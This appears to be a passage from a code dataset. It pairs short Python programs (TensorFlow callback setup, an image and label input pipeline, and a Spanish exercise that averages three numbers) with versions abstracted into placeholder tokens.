"# !/usr/bin/env python3.6\n# -*- coding: utf-8 -*-\n\nimport os\nfrom datetime import datetime\nimport tensorflow as tf\n\ncwd = os.getcwd()\n\nexps_dir = os.path.join(cwd, 'classification_experiments')\nif not os.path.exists(exps_dir):\n\tos.makedirs(exps_dir)\n\nnow = datetime.now().strftime('%b%d_%H-%M-%S')\n\nmodel_name = 'CNN'\n\nexp_dir = os.path.join(exps_dir, model_name + '_' + str(now))\nif not os.path.exists(exp_dir):\n\tos.makedirs(exp_dir)\n\ncallbacks = []\n\n# Model checkpoint\n# ----------------\nckpt_dir = os.path.join(exp_dir, 'ckpts')\nif not os.path.exists(ckpt_dir):\n\tos.makedirs(ckpt_dir)\n\nckpt_callback = tf.keras.callbacks.ModelCheckpoint(filepath=os.path.join(ckpt_dir, 'cp_{epoch:02d}.ckpt'),\n\t\t\t\t\t\t\t\t\t\t\t\t save_weights_only=True) # False to save the model directly\ncallbacks.append(ckpt_callback)\n\n# Visualize Learning on Tensorboard\n# ---------------------------------\ntb_dir = os.path.join(exp_dir, 'tb_logs')\nif not os.path.exists(tb_dir):\n\tos.makedirs(tb_dir)\n\n# By default shows losses and metrics for both training and validation\ntb_callback = tf.keras.callbacks.TensorBoard(log_dir=tb_dir,\n\t\t\t\t\t\t\t\t\t\t\t profile_batch=0,\n\t\t\t\t\t\t\t\t\t\t\t histogram_freq=1) # if 1 shows weights histograms\ncallbacks.append(tb_callback)\n\n# Early Stopping\n# --------------\nearly_stop = False\nif early_stop:\n\tes_callback = tf.keras.callback.EarlyStopping(monitor='val_loss', patience=10)\n\tcallbacks.append(es_callback)\n\n# How to visualize Tensorboard\n\n# 1. tensorboard --logdir EXPERIMENTS_DIR --port PORT <- from terminal\n# 2. localhost:PORT <- in your browser",
"import os\nfrom datetime import datetime\nimport tensorflow as tf\ncwd = os.getcwd()\nexps_dir = os.path.join(cwd, 'classification_experiments')\nif not os.path.exists(exps_dir):\n os.makedirs(exps_dir)\nnow = datetime.now().strftime('%b%d_%H-%M-%S')\nmodel_name = 'CNN'\nexp_dir = os.path.join(exps_dir, model_name + '_' + str(now))\nif not os.path.exists(exp_dir):\n os.makedirs(exp_dir)\ncallbacks = []\nckpt_dir = os.path.join(exp_dir, 'ckpts')\nif not os.path.exists(ckpt_dir):\n os.makedirs(ckpt_dir)\nckpt_callback = tf.keras.callbacks.ModelCheckpoint(filepath=os.path.join(\n ckpt_dir, 'cp_{epoch:02d}.ckpt'), save_weights_only=True)\ncallbacks.append(ckpt_callback)\ntb_dir = os.path.join(exp_dir, 'tb_logs')\nif not os.path.exists(tb_dir):\n os.makedirs(tb_dir)\ntb_callback = tf.keras.callbacks.TensorBoard(log_dir=tb_dir, profile_batch=\n 0, histogram_freq=1)\ncallbacks.append(tb_callback)\nearly_stop = False\nif early_stop:\n es_callback = tf.keras.callback.EarlyStopping(monitor='val_loss',\n patience=10)\n callbacks.append(es_callback)\n",
"<import token>\ncwd = os.getcwd()\nexps_dir = os.path.join(cwd, 'classification_experiments')\nif not os.path.exists(exps_dir):\n os.makedirs(exps_dir)\nnow = datetime.now().strftime('%b%d_%H-%M-%S')\nmodel_name = 'CNN'\nexp_dir = os.path.join(exps_dir, model_name + '_' + str(now))\nif not os.path.exists(exp_dir):\n os.makedirs(exp_dir)\ncallbacks = []\nckpt_dir = os.path.join(exp_dir, 'ckpts')\nif not os.path.exists(ckpt_dir):\n os.makedirs(ckpt_dir)\nckpt_callback = tf.keras.callbacks.ModelCheckpoint(filepath=os.path.join(\n ckpt_dir, 'cp_{epoch:02d}.ckpt'), save_weights_only=True)\ncallbacks.append(ckpt_callback)\ntb_dir = os.path.join(exp_dir, 'tb_logs')\nif not os.path.exists(tb_dir):\n os.makedirs(tb_dir)\ntb_callback = tf.keras.callbacks.TensorBoard(log_dir=tb_dir, profile_batch=\n 0, histogram_freq=1)\ncallbacks.append(tb_callback)\nearly_stop = False\nif early_stop:\n es_callback = tf.keras.callback.EarlyStopping(monitor='val_loss',\n patience=10)\n callbacks.append(es_callback)\n",
"<import token>\n<assignment token>\nif not os.path.exists(exps_dir):\n os.makedirs(exps_dir)\n<assignment token>\nif not os.path.exists(exp_dir):\n os.makedirs(exp_dir)\n<assignment token>\nif not os.path.exists(ckpt_dir):\n os.makedirs(ckpt_dir)\n<assignment token>\ncallbacks.append(ckpt_callback)\n<assignment token>\nif not os.path.exists(tb_dir):\n os.makedirs(tb_dir)\n<assignment token>\ncallbacks.append(tb_callback)\n<assignment token>\nif early_stop:\n es_callback = tf.keras.callback.EarlyStopping(monitor='val_loss',\n patience=10)\n callbacks.append(es_callback)\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n"
] | false |
99,866 | 5180d8deafcdf83c5c79636978bb0bfdfa2ba0dd | # Mini-desafio
# Diseñar un programa en el cual el usuario ingrese tres números, uno a la vez, y se # muestre a la salida el promedio de los tres números.
num1 = int(input("Ingrese el primer numero:"))
num2 = int(input("Ingrese el segundo numero:"))
num3 = int(input("Ingrese el tercer numero:"))
suma = num1 + num2 + num3
promedio = suma/3
print(promedio)
| [
"# Mini-desafio\n# Diseñar un programa en el cual el usuario ingrese tres números, uno a la vez, y se # muestre a la salida el promedio de los tres números.\n\nnum1 = int(input(\"Ingrese el primer numero:\"))\nnum2 = int(input(\"Ingrese el segundo numero:\"))\nnum3 = int(input(\"Ingrese el tercer numero:\"))\n\nsuma = num1 + num2 + num3\npromedio = suma/3\nprint(promedio)\n",
"num1 = int(input('Ingrese el primer numero:'))\nnum2 = int(input('Ingrese el segundo numero:'))\nnum3 = int(input('Ingrese el tercer numero:'))\nsuma = num1 + num2 + num3\npromedio = suma / 3\nprint(promedio)\n",
"<assignment token>\nprint(promedio)\n",
"<assignment token>\n<code token>\n"
] | false |
99,867 | 72183a250a1652510198f1c44b258d1b58ece15d | import tensorflow as tf
import functools
import os
import glob
import numpy as np
from PIL import Image
def from_0_1_to_m1_1(images):
"""
Center images from [0, 1) to [-1, 1).
Arguments:
images: tf.float32, in [0, 1), of any dimensions
Return:
images linearly scaled to [-1, 1)
"""
# shifting from [0, 1) to [-1, 1) is equivalent to assuming 0.5 mean
mean = 0.5
proimages = (images - mean) / mean
return proimages
def _parse_and_decode(filename, dataset_directory):
"""
Args:
filename:
dataset_directory:
Returns:
"""
filename_split = tf.unstack(tf.string_split([filename], "_").values[:-1], num=3)
strip_filename = tf.string_join(filename_split, "_")
im_dir = tf.cast(os.path.join(dataset_directory, 'images/'), tf.string)
la_dir = tf.cast(os.path.join(dataset_directory, 'panoptic_proc/'), tf.string)
im_ext = tf.cast('.png', tf.string)
la_ext = tf.cast('_gtFine_instanceIds.png', tf.string)
im_filename = tf.string_join([im_dir, filename, im_ext])
la_filename = tf.string_join([la_dir, strip_filename, la_ext])
im_dec = tf.image.decode_jpeg(tf.read_file(im_filename))
# Check if the image is in greyscale and convert to RGB if so
greyscale_cond = tf.equal(tf.shape(im_dec)[-1], 1)
im_dec = tf.cond(greyscale_cond,
lambda: tf.image.grayscale_to_rgb(im_dec),
lambda: tf.identity(im_dec))
im_dec = tf.image.convert_image_dtype(im_dec, dtype=tf.float32)
im_dec = from_0_1_to_m1_1(im_dec)
la_dec = tf.image.decode_png(tf.read_file(la_filename))
return im_dec, la_dec
def _parse_and_decode_inference(filename, dataset_directory):
im_dir = tf.cast(os.path.join(dataset_directory, 'images/'), tf.string)
im_ext = tf.cast('.png', tf.string)
im_filename = tf.string_join([im_dir, filename, im_ext])
im_dec = tf.image.decode_jpeg(tf.read_file(im_filename))
im_dec_raw = im_dec
# Check if the image is in greyscale and convert to RGB if so
greyscale_cond = tf.equal(tf.shape(im_dec)[-1], 1)
im_dec = tf.cond(greyscale_cond,
lambda: tf.image.grayscale_to_rgb(im_dec),
lambda: tf.identity(im_dec))
im_dec = tf.image.convert_image_dtype(im_dec, dtype=tf.float32)
im_dec = from_0_1_to_m1_1(im_dec)
return im_dec, im_filename, im_dec_raw
def _preprocess_images(image, label, params):
if params.random_flip:
label = tf.cast(tf.expand_dims(label, -1), tf.float32)
im_la = tf.concat([image, label], axis=-1)
im_la = tf.image.random_flip_left_right(im_la)
image = im_la[..., 0:3]
label = im_la[..., 3]
label = tf.cast(label, tf.uint8)
label = tf.squeeze(label)
image.set_shape([params.height_input, params.width_input, 3])
label.set_shape([params.height_input, params.width_input])
return image, label
def _resize_images(image, label, height, width):
"""
Args:
image:
label:
height:
width:
Returns:
"""
im_res = tf.image.resize_images(image, [height, width])
la_res = tf.image.resize_images(label, [height, width],
method=tf.image.ResizeMethod.NEAREST_NEIGHBOR)
la_res = tf.squeeze(la_res, axis=2)
im_res.set_shape([height, width, 3])
la_res.set_shape([height, width])
return im_res, la_res
def _resize_images_inference(image, im_filename, im_raw, height, width):
"""
Args:
image:
label:
height:
width:
Returns:
"""
im_res = tf.image.resize_images(image, [height, width])
im_res.set_shape([height, width, 3])
return im_res, im_filename, im_raw
def train_input(params):
"""
Args:
params:
Returns:
"""
dataset_directory = params.dataset_directory
filelist_filepath = params.filelist_filepath
filenames_string = tf.cast(filelist_filepath, tf.string)
dataset = tf.data.TextLineDataset(filenames=filenames_string)
dataset = dataset.map(
functools.partial(_parse_and_decode, dataset_directory=dataset_directory),
num_parallel_calls=30)
dataset = dataset.map(
functools.partial(_resize_images, height=params.height_input, width=params.width_input))
dataset = dataset.map(
functools.partial(_preprocess_images, params=params))
# IMPORTANT: if Nb > 1, then shape of dataset elements must be the same
dataset = dataset.batch(params.Nb)
dataset = dataset.shuffle(100)
dataset = dataset.repeat(None)
return dataset
def evaluate_input(params):
"""
Args:
params:
Returns:
"""
dataset_directory = params.dataset_directory
filelist_filepath = params.filelist_filepath
filenames_string = tf.cast(filelist_filepath, tf.string)
dataset = tf.data.TextLineDataset(filenames=filenames_string)
dataset = dataset.map(
functools.partial(_parse_and_decode, dataset_directory=dataset_directory),
num_parallel_calls=30)
dataset = dataset.map(
functools.partial(_resize_images, height=params.height_input, width=params.width_input))
# IMPORTANT: if Nb > 1, then shape of dataset elements must be the same
dataset = dataset.batch(1)
return dataset
def inference_input(params):
"""
Args:
params:
Returns:
"""
dataset_directory = params.dataset_directory
filelist_filepath = params.filelist_filepath
filenames_string = tf.cast(filelist_filepath, tf.string)
dataset = tf.data.TextLineDataset(filenames=filenames_string)
dataset = dataset.map(
functools.partial(_parse_and_decode_inference, dataset_directory=dataset_directory),
num_parallel_calls=30)
dataset = dataset.map(
functools.partial(_resize_images_inference, height=params.height_input, width=params.width_input))
# IMPORTANT: if Nb > 1, then shape of dataset elements must be the same
dataset = dataset.batch(1)
return dataset | [
"import tensorflow as tf\nimport functools\nimport os\nimport glob\nimport numpy as np\nfrom PIL import Image\n\ndef from_0_1_to_m1_1(images):\n \"\"\"\n Center images from [0, 1) to [-1, 1).\n\n Arguments:\n images: tf.float32, in [0, 1), of any dimensions\n\n Return:\n images linearly scaled to [-1, 1)\n \"\"\"\n\n # shifting from [0, 1) to [-1, 1) is equivalent to assuming 0.5 mean\n mean = 0.5\n proimages = (images - mean) / mean\n\n return proimages\n\ndef _parse_and_decode(filename, dataset_directory):\n \"\"\"\n\n Args:\n filename:\n dataset_directory:\n\n Returns:\n\n \"\"\"\n filename_split = tf.unstack(tf.string_split([filename], \"_\").values[:-1], num=3)\n strip_filename = tf.string_join(filename_split, \"_\")\n\n im_dir = tf.cast(os.path.join(dataset_directory, 'images/'), tf.string)\n la_dir = tf.cast(os.path.join(dataset_directory, 'panoptic_proc/'), tf.string)\n im_ext = tf.cast('.png', tf.string)\n la_ext = tf.cast('_gtFine_instanceIds.png', tf.string)\n\n im_filename = tf.string_join([im_dir, filename, im_ext])\n la_filename = tf.string_join([la_dir, strip_filename, la_ext])\n\n im_dec = tf.image.decode_jpeg(tf.read_file(im_filename))\n\n # Check if the image is in greyscale and convert to RGB if so\n greyscale_cond = tf.equal(tf.shape(im_dec)[-1], 1)\n im_dec = tf.cond(greyscale_cond,\n lambda: tf.image.grayscale_to_rgb(im_dec),\n lambda: tf.identity(im_dec))\n\n im_dec = tf.image.convert_image_dtype(im_dec, dtype=tf.float32)\n im_dec = from_0_1_to_m1_1(im_dec)\n\n la_dec = tf.image.decode_png(tf.read_file(la_filename))\n\n return im_dec, la_dec\n\ndef _parse_and_decode_inference(filename, dataset_directory):\n im_dir = tf.cast(os.path.join(dataset_directory, 'images/'), tf.string)\n im_ext = tf.cast('.png', tf.string)\n\n im_filename = tf.string_join([im_dir, filename, im_ext])\n im_dec = tf.image.decode_jpeg(tf.read_file(im_filename))\n im_dec_raw = im_dec\n\n # Check if the image is in greyscale and convert to RGB if so\n greyscale_cond = tf.equal(tf.shape(im_dec)[-1], 1)\n im_dec = tf.cond(greyscale_cond,\n lambda: tf.image.grayscale_to_rgb(im_dec),\n lambda: tf.identity(im_dec))\n\n im_dec = tf.image.convert_image_dtype(im_dec, dtype=tf.float32)\n im_dec = from_0_1_to_m1_1(im_dec)\n\n return im_dec, im_filename, im_dec_raw\n\ndef _preprocess_images(image, label, params):\n if params.random_flip:\n label = tf.cast(tf.expand_dims(label, -1), tf.float32)\n im_la = tf.concat([image, label], axis=-1)\n im_la = tf.image.random_flip_left_right(im_la)\n\n image = im_la[..., 0:3]\n label = im_la[..., 3]\n\n label = tf.cast(label, tf.uint8)\n label = tf.squeeze(label)\n\n image.set_shape([params.height_input, params.width_input, 3])\n label.set_shape([params.height_input, params.width_input])\n\n return image, label\n\ndef _resize_images(image, label, height, width):\n \"\"\"\n\n Args:\n image:\n label:\n height:\n width:\n\n Returns:\n\n \"\"\"\n im_res = tf.image.resize_images(image, [height, width])\n la_res = tf.image.resize_images(label, [height, width],\n method=tf.image.ResizeMethod.NEAREST_NEIGHBOR)\n la_res = tf.squeeze(la_res, axis=2)\n\n im_res.set_shape([height, width, 3])\n la_res.set_shape([height, width])\n\n return im_res, la_res\n\ndef _resize_images_inference(image, im_filename, im_raw, height, width):\n \"\"\"\n\n Args:\n image:\n label:\n height:\n width:\n\n Returns:\n\n \"\"\"\n im_res = tf.image.resize_images(image, [height, width])\n im_res.set_shape([height, width, 3])\n\n return im_res, im_filename, im_raw\n\ndef train_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n\n dataset = dataset.map(\n functools.partial(_parse_and_decode, dataset_directory=dataset_directory),\n num_parallel_calls=30)\n\n dataset = dataset.map(\n functools.partial(_resize_images, height=params.height_input, width=params.width_input))\n\n dataset = dataset.map(\n functools.partial(_preprocess_images, params=params))\n\n # IMPORTANT: if Nb > 1, then shape of dataset elements must be the same\n dataset = dataset.batch(params.Nb)\n dataset = dataset.shuffle(100)\n dataset = dataset.repeat(None)\n\n return dataset\n\ndef evaluate_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n\n dataset = dataset.map(\n functools.partial(_parse_and_decode, dataset_directory=dataset_directory),\n num_parallel_calls=30)\n\n dataset = dataset.map(\n functools.partial(_resize_images, height=params.height_input, width=params.width_input))\n\n # IMPORTANT: if Nb > 1, then shape of dataset elements must be the same\n dataset = dataset.batch(1)\n\n return dataset\n\ndef inference_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n\n dataset = dataset.map(\n functools.partial(_parse_and_decode_inference, dataset_directory=dataset_directory),\n num_parallel_calls=30)\n\n dataset = dataset.map(\n functools.partial(_resize_images_inference, height=params.height_input, width=params.width_input))\n\n # IMPORTANT: if Nb > 1, then shape of dataset elements must be the same\n dataset = dataset.batch(1)\n\n return dataset",
"import tensorflow as tf\nimport functools\nimport os\nimport glob\nimport numpy as np\nfrom PIL import Image\n\n\ndef from_0_1_to_m1_1(images):\n \"\"\"\n Center images from [0, 1) to [-1, 1).\n\n Arguments:\n images: tf.float32, in [0, 1), of any dimensions\n\n Return:\n images linearly scaled to [-1, 1)\n \"\"\"\n mean = 0.5\n proimages = (images - mean) / mean\n return proimages\n\n\ndef _parse_and_decode(filename, dataset_directory):\n \"\"\"\n\n Args:\n filename:\n dataset_directory:\n\n Returns:\n\n \"\"\"\n filename_split = tf.unstack(tf.string_split([filename], '_').values[:-1\n ], num=3)\n strip_filename = tf.string_join(filename_split, '_')\n im_dir = tf.cast(os.path.join(dataset_directory, 'images/'), tf.string)\n la_dir = tf.cast(os.path.join(dataset_directory, 'panoptic_proc/'), tf.\n string)\n im_ext = tf.cast('.png', tf.string)\n la_ext = tf.cast('_gtFine_instanceIds.png', tf.string)\n im_filename = tf.string_join([im_dir, filename, im_ext])\n la_filename = tf.string_join([la_dir, strip_filename, la_ext])\n im_dec = tf.image.decode_jpeg(tf.read_file(im_filename))\n greyscale_cond = tf.equal(tf.shape(im_dec)[-1], 1)\n im_dec = tf.cond(greyscale_cond, lambda : tf.image.grayscale_to_rgb(\n im_dec), lambda : tf.identity(im_dec))\n im_dec = tf.image.convert_image_dtype(im_dec, dtype=tf.float32)\n im_dec = from_0_1_to_m1_1(im_dec)\n la_dec = tf.image.decode_png(tf.read_file(la_filename))\n return im_dec, la_dec\n\n\ndef _parse_and_decode_inference(filename, dataset_directory):\n im_dir = tf.cast(os.path.join(dataset_directory, 'images/'), tf.string)\n im_ext = tf.cast('.png', tf.string)\n im_filename = tf.string_join([im_dir, filename, im_ext])\n im_dec = tf.image.decode_jpeg(tf.read_file(im_filename))\n im_dec_raw = im_dec\n greyscale_cond = tf.equal(tf.shape(im_dec)[-1], 1)\n im_dec = tf.cond(greyscale_cond, lambda : tf.image.grayscale_to_rgb(\n im_dec), lambda : tf.identity(im_dec))\n im_dec = tf.image.convert_image_dtype(im_dec, dtype=tf.float32)\n im_dec = from_0_1_to_m1_1(im_dec)\n return im_dec, im_filename, im_dec_raw\n\n\ndef _preprocess_images(image, label, params):\n if params.random_flip:\n label = tf.cast(tf.expand_dims(label, -1), tf.float32)\n im_la = tf.concat([image, label], axis=-1)\n im_la = tf.image.random_flip_left_right(im_la)\n image = im_la[..., 0:3]\n label = im_la[..., 3]\n label = tf.cast(label, tf.uint8)\n label = tf.squeeze(label)\n image.set_shape([params.height_input, params.width_input, 3])\n label.set_shape([params.height_input, params.width_input])\n return image, label\n\n\ndef _resize_images(image, label, height, width):\n \"\"\"\n\n Args:\n image:\n label:\n height:\n width:\n\n Returns:\n\n \"\"\"\n im_res = tf.image.resize_images(image, [height, width])\n la_res = tf.image.resize_images(label, [height, width], method=tf.image\n .ResizeMethod.NEAREST_NEIGHBOR)\n la_res = tf.squeeze(la_res, axis=2)\n im_res.set_shape([height, width, 3])\n la_res.set_shape([height, width])\n return im_res, la_res\n\n\ndef _resize_images_inference(image, im_filename, im_raw, height, width):\n \"\"\"\n\n Args:\n image:\n label:\n height:\n width:\n\n Returns:\n\n \"\"\"\n im_res = tf.image.resize_images(image, [height, width])\n im_res.set_shape([height, width, 3])\n return im_res, im_filename, im_raw\n\n\ndef train_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n dataset = dataset.map(functools.partial(_parse_and_decode,\n dataset_directory=dataset_directory), num_parallel_calls=30)\n dataset = dataset.map(functools.partial(_resize_images, height=params.\n height_input, width=params.width_input))\n dataset = dataset.map(functools.partial(_preprocess_images, params=params))\n dataset = dataset.batch(params.Nb)\n dataset = dataset.shuffle(100)\n dataset = dataset.repeat(None)\n return dataset\n\n\ndef evaluate_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n dataset = dataset.map(functools.partial(_parse_and_decode,\n dataset_directory=dataset_directory), num_parallel_calls=30)\n dataset = dataset.map(functools.partial(_resize_images, height=params.\n height_input, width=params.width_input))\n dataset = dataset.batch(1)\n return dataset\n\n\ndef inference_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n dataset = dataset.map(functools.partial(_parse_and_decode_inference,\n dataset_directory=dataset_directory), num_parallel_calls=30)\n dataset = dataset.map(functools.partial(_resize_images_inference,\n height=params.height_input, width=params.width_input))\n dataset = dataset.batch(1)\n return dataset\n",
"<import token>\n\n\ndef from_0_1_to_m1_1(images):\n \"\"\"\n Center images from [0, 1) to [-1, 1).\n\n Arguments:\n images: tf.float32, in [0, 1), of any dimensions\n\n Return:\n images linearly scaled to [-1, 1)\n \"\"\"\n mean = 0.5\n proimages = (images - mean) / mean\n return proimages\n\n\ndef _parse_and_decode(filename, dataset_directory):\n \"\"\"\n\n Args:\n filename:\n dataset_directory:\n\n Returns:\n\n \"\"\"\n filename_split = tf.unstack(tf.string_split([filename], '_').values[:-1\n ], num=3)\n strip_filename = tf.string_join(filename_split, '_')\n im_dir = tf.cast(os.path.join(dataset_directory, 'images/'), tf.string)\n la_dir = tf.cast(os.path.join(dataset_directory, 'panoptic_proc/'), tf.\n string)\n im_ext = tf.cast('.png', tf.string)\n la_ext = tf.cast('_gtFine_instanceIds.png', tf.string)\n im_filename = tf.string_join([im_dir, filename, im_ext])\n la_filename = tf.string_join([la_dir, strip_filename, la_ext])\n im_dec = tf.image.decode_jpeg(tf.read_file(im_filename))\n greyscale_cond = tf.equal(tf.shape(im_dec)[-1], 1)\n im_dec = tf.cond(greyscale_cond, lambda : tf.image.grayscale_to_rgb(\n im_dec), lambda : tf.identity(im_dec))\n im_dec = tf.image.convert_image_dtype(im_dec, dtype=tf.float32)\n im_dec = from_0_1_to_m1_1(im_dec)\n la_dec = tf.image.decode_png(tf.read_file(la_filename))\n return im_dec, la_dec\n\n\ndef _parse_and_decode_inference(filename, dataset_directory):\n im_dir = tf.cast(os.path.join(dataset_directory, 'images/'), tf.string)\n im_ext = tf.cast('.png', tf.string)\n im_filename = tf.string_join([im_dir, filename, im_ext])\n im_dec = tf.image.decode_jpeg(tf.read_file(im_filename))\n im_dec_raw = im_dec\n greyscale_cond = tf.equal(tf.shape(im_dec)[-1], 1)\n im_dec = tf.cond(greyscale_cond, lambda : tf.image.grayscale_to_rgb(\n im_dec), lambda : tf.identity(im_dec))\n im_dec = tf.image.convert_image_dtype(im_dec, dtype=tf.float32)\n im_dec = from_0_1_to_m1_1(im_dec)\n return im_dec, im_filename, im_dec_raw\n\n\ndef _preprocess_images(image, label, params):\n if params.random_flip:\n label = tf.cast(tf.expand_dims(label, -1), tf.float32)\n im_la = tf.concat([image, label], axis=-1)\n im_la = tf.image.random_flip_left_right(im_la)\n image = im_la[..., 0:3]\n label = im_la[..., 3]\n label = tf.cast(label, tf.uint8)\n label = tf.squeeze(label)\n image.set_shape([params.height_input, params.width_input, 3])\n label.set_shape([params.height_input, params.width_input])\n return image, label\n\n\ndef _resize_images(image, label, height, width):\n \"\"\"\n\n Args:\n image:\n label:\n height:\n width:\n\n Returns:\n\n \"\"\"\n im_res = tf.image.resize_images(image, [height, width])\n la_res = tf.image.resize_images(label, [height, width], method=tf.image\n .ResizeMethod.NEAREST_NEIGHBOR)\n la_res = tf.squeeze(la_res, axis=2)\n im_res.set_shape([height, width, 3])\n la_res.set_shape([height, width])\n return im_res, la_res\n\n\ndef _resize_images_inference(image, im_filename, im_raw, height, width):\n \"\"\"\n\n Args:\n image:\n label:\n height:\n width:\n\n Returns:\n\n \"\"\"\n im_res = tf.image.resize_images(image, [height, width])\n im_res.set_shape([height, width, 3])\n return im_res, im_filename, im_raw\n\n\ndef train_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n dataset = dataset.map(functools.partial(_parse_and_decode,\n dataset_directory=dataset_directory), num_parallel_calls=30)\n dataset = dataset.map(functools.partial(_resize_images, height=params.\n height_input, width=params.width_input))\n dataset = dataset.map(functools.partial(_preprocess_images, params=params))\n dataset = dataset.batch(params.Nb)\n dataset = dataset.shuffle(100)\n dataset = dataset.repeat(None)\n return dataset\n\n\ndef evaluate_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n dataset = dataset.map(functools.partial(_parse_and_decode,\n dataset_directory=dataset_directory), num_parallel_calls=30)\n dataset = dataset.map(functools.partial(_resize_images, height=params.\n height_input, width=params.width_input))\n dataset = dataset.batch(1)\n return dataset\n\n\ndef inference_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n dataset = dataset.map(functools.partial(_parse_and_decode_inference,\n dataset_directory=dataset_directory), num_parallel_calls=30)\n dataset = dataset.map(functools.partial(_resize_images_inference,\n height=params.height_input, width=params.width_input))\n dataset = dataset.batch(1)\n return dataset\n",
"<import token>\n\n\ndef from_0_1_to_m1_1(images):\n \"\"\"\n Center images from [0, 1) to [-1, 1).\n\n Arguments:\n images: tf.float32, in [0, 1), of any dimensions\n\n Return:\n images linearly scaled to [-1, 1)\n \"\"\"\n mean = 0.5\n proimages = (images - mean) / mean\n return proimages\n\n\ndef _parse_and_decode(filename, dataset_directory):\n \"\"\"\n\n Args:\n filename:\n dataset_directory:\n\n Returns:\n\n \"\"\"\n filename_split = tf.unstack(tf.string_split([filename], '_').values[:-1\n ], num=3)\n strip_filename = tf.string_join(filename_split, '_')\n im_dir = tf.cast(os.path.join(dataset_directory, 'images/'), tf.string)\n la_dir = tf.cast(os.path.join(dataset_directory, 'panoptic_proc/'), tf.\n string)\n im_ext = tf.cast('.png', tf.string)\n la_ext = tf.cast('_gtFine_instanceIds.png', tf.string)\n im_filename = tf.string_join([im_dir, filename, im_ext])\n la_filename = tf.string_join([la_dir, strip_filename, la_ext])\n im_dec = tf.image.decode_jpeg(tf.read_file(im_filename))\n greyscale_cond = tf.equal(tf.shape(im_dec)[-1], 1)\n im_dec = tf.cond(greyscale_cond, lambda : tf.image.grayscale_to_rgb(\n im_dec), lambda : tf.identity(im_dec))\n im_dec = tf.image.convert_image_dtype(im_dec, dtype=tf.float32)\n im_dec = from_0_1_to_m1_1(im_dec)\n la_dec = tf.image.decode_png(tf.read_file(la_filename))\n return im_dec, la_dec\n\n\ndef _parse_and_decode_inference(filename, dataset_directory):\n im_dir = tf.cast(os.path.join(dataset_directory, 'images/'), tf.string)\n im_ext = tf.cast('.png', tf.string)\n im_filename = tf.string_join([im_dir, filename, im_ext])\n im_dec = tf.image.decode_jpeg(tf.read_file(im_filename))\n im_dec_raw = im_dec\n greyscale_cond = tf.equal(tf.shape(im_dec)[-1], 1)\n im_dec = tf.cond(greyscale_cond, lambda : tf.image.grayscale_to_rgb(\n im_dec), lambda : tf.identity(im_dec))\n im_dec = tf.image.convert_image_dtype(im_dec, dtype=tf.float32)\n im_dec = from_0_1_to_m1_1(im_dec)\n return im_dec, im_filename, im_dec_raw\n\n\ndef _preprocess_images(image, label, params):\n if params.random_flip:\n label = tf.cast(tf.expand_dims(label, -1), tf.float32)\n im_la = tf.concat([image, label], axis=-1)\n im_la = tf.image.random_flip_left_right(im_la)\n image = im_la[..., 0:3]\n label = im_la[..., 3]\n label = tf.cast(label, tf.uint8)\n label = tf.squeeze(label)\n image.set_shape([params.height_input, params.width_input, 3])\n label.set_shape([params.height_input, params.width_input])\n return image, label\n\n\ndef _resize_images(image, label, height, width):\n \"\"\"\n\n Args:\n image:\n label:\n height:\n width:\n\n Returns:\n\n \"\"\"\n im_res = tf.image.resize_images(image, [height, width])\n la_res = tf.image.resize_images(label, [height, width], method=tf.image\n .ResizeMethod.NEAREST_NEIGHBOR)\n la_res = tf.squeeze(la_res, axis=2)\n im_res.set_shape([height, width, 3])\n la_res.set_shape([height, width])\n return im_res, la_res\n\n\ndef _resize_images_inference(image, im_filename, im_raw, height, width):\n \"\"\"\n\n Args:\n image:\n label:\n height:\n width:\n\n Returns:\n\n \"\"\"\n im_res = tf.image.resize_images(image, [height, width])\n im_res.set_shape([height, width, 3])\n return im_res, im_filename, im_raw\n\n\ndef train_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n dataset = 